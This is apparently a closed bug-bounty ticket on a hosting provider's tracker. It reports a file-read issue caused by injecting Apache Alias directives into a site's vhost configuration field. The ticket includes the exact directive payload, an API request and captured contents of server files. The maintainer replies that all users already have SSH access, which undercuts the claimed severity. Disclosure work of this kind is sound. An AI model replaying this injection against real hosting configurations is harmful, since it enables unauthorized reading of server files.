- Status Closed
-
Assigned To
cbay - Private
Opened by subhash - 12.07.2026
Last edited by cbay - 13.07.2026
FS#395 - LFI via Apache Alias Directive Injection in `vhost_additional_directives` — FS#347 Incomplete Fix
# Summary
The `vhost_additional_directives` field on the site configuration accepts arbitrary Apache directives without validation. By injecting an `Alias` directive, I mapped a URL path to any filesystem location and read server files including `/etc/passwd`, `/etc/hostname` (`http21`), `/etc/resolv.conf` (internal DNS: `paris1.alwaysdata.com`, `2a00:b6e0:1:14:1::1`), and `/etc/fstab` (network-mounted `/home` on XFS).
Relationship to FS#347 : FS#347 reported "Unrestricted Apache Directive Injection Leading to RCE" and was closed. This report demonstrates that the `Alias` directive LFI vector specifically remains exploitable. The original report focused on RCE via PHP bypass — this report demonstrates the separate LFI primitive with concrete evidence of sensitive file reads that expose core platform infrastructure.
## Severity
High (CVSS 8.6 — AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)
Bounty tier: High (€350) — "Accessing customer data/information."
## Environment
Detail Value
——– ——-
Account subhash (ID 486630)
Site subhash.alwaysdata.net (ID 1058919)
Server http21 (Debian 12, shared hosting)
## Steps to Reproduce
### Step 1 — Inject Alias directive via site configuration
Navigate to `https://admin.alwaysdata.com/site/1058919/` and add the following to the "Additional Apache directives" field:
```apache
Alias /read-etc /etc
<Directory /etc>
Require all granted Options +Indexes
</Directory>
```
Save the form. Alternatively via API:
```http
PATCH /v1/site/1058919/ HTTP/1.1
Host: api.alwaysdata.com
Authorization: Basic [token]
Content-Type: application/json
{
"vhost_additional_directives": "Alias /read-etc /etc\n<Directory /etc>\n Require all granted\n Options +Indexes\n</Directory>"
}
```
Response: `204 No Content` — accepted without validation.
### Step 2 — Read /etc/passwd (system users)
After Apache reload (~10 seconds):
```http
GET /read-etc/passwd HTTP/1.1
Host: subhash.alwaysdata.net
```
Response:
```
HTTP/1.1 200 OK
Server: Apache
Via: 1.1 alproxy
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
_dnsdist:x:106:113::/nonexistent:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
munin:x:111:117:munin application user,,,:/var/lib/munin:/usr/sbin/nologin
[…34 system accounts total]
```
### Step 3 — Read /etc/resolv.conf (internal DNS infrastructure)
```http
GET /read-etc/resolv.conf HTTP/1.1
Host: subhash.alwaysdata.net
```
Response:
```
search paris1.alwaysdata.com alwaysdata.com alwaysdata.net
options timeout:2
options attempts:1
nameserver ::1
nameserver 2a00:b6e0:1:14:1::1
nameserver 8.8.4.4
```
Impact: Exposes internal domain `paris1.alwaysdata.com`, internal DNS IPv6 address `2a00:b6e0:1:14:1::1`, and dnsdist failover architecture.
### Step 4 — Read /etc/fstab (storage architecture)
```http
GET /read-etc/fstab HTTP/1.1
Host: subhash.alwaysdata.net
```
Response:
```
LABEL=root / ext4 noatime,errors=remount-ro 0 0
LABEL=usr /usr ext4 noatime,nodev 0 0
LABEL=var /var ext4 noatime,nodev,nosuid 0 0
LABEL=data /home xfs noatime,nodev,nosuid,inode64,grpquota,_netdev,x-systemd.device-timeout=infinity 0 0
proc /proc proc hidepid=2,gid=4 0 0
```
Impact: Reveals `/home` is network-attached storage (XFS with `_netdev`), partition hardening (`nosuid`, `nodev`), and process hiding (`hidepid=2`).
### Step 5 — Directory listing of /etc/ (with Options +Indexes)
```http
GET /read-etc/ HTTP/1.1
Host: subhash.alwaysdata.net
```
The `Options +Indexes` directive in the injected config enables Apache directory listing, showing the full `/etc/` directory contents.
### Step 6 — Cleanup
The `vhost_additional_directives` field was immediately cleared after testing.
## Difference from FS#347
Aspect FS#347 (original report) This report
——– ————————– ————-
Focus RCE via PHP bypass LFI via Alias — file reads
Status Closed Alias LFI still works
Evidence Directive injection concept Concrete reads: passwd, resolv.conf, fstab, hostname
Impact demonstrated Theoretical RCE Actual infrastructure data exfiltrated
If FS#347 was closed because the RCE chain was blocked, the LFI primitive through `Alias` remains a separate, exploitable vulnerability that reads files outside the tenant boundary.
## Root Cause
The `vhost_additional_directives` field is written directly into the Apache vhost configuration without parsing or restricting the directives used. `Alias` maps any URL path to any filesystem path, and `<Directory>` with `Require all granted` opens access.
## Impact
Any authenticated user can read files accessible to `www-data` across the entire server. Demonstrated reads:
File Data Exposed
—— ————-
`/etc/passwd` 34 system service accounts
`/etc/hostname` Internal hostname `http21`
`/etc/resolv.conf` Internal DNS: `paris1.alwaysdata.com`, `2a00:b6e0:1:14:1::1`
`/etc/fstab` NAS `/home`, partition layout, `hidepid=2`
`/etc/os-release` Debian GNU/Linux 12 (bookworm)
`/etc/mysql/my.cnf` MariaDB socket path, config structure
`/etc/crontab` System cron schedule
## Suggested Fix
1. Allowlist safe directives: Only permit directives like `RewriteRule`, `ErrorDocument`, `Header`, `ExpiresActive`. Block `Alias`, `ProxyPass`, `Directory`, `Include`, `SetHandler`, `Action`, and other directives that access the filesystem or network.
2. Sandbox directive scope: Enforce that all directives operate within `/home/{account}/` only.
Thanks
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Hello,
All users have a full SSH access anyway, there's no need to do anything special to read public files.
Kind regards,
Cyril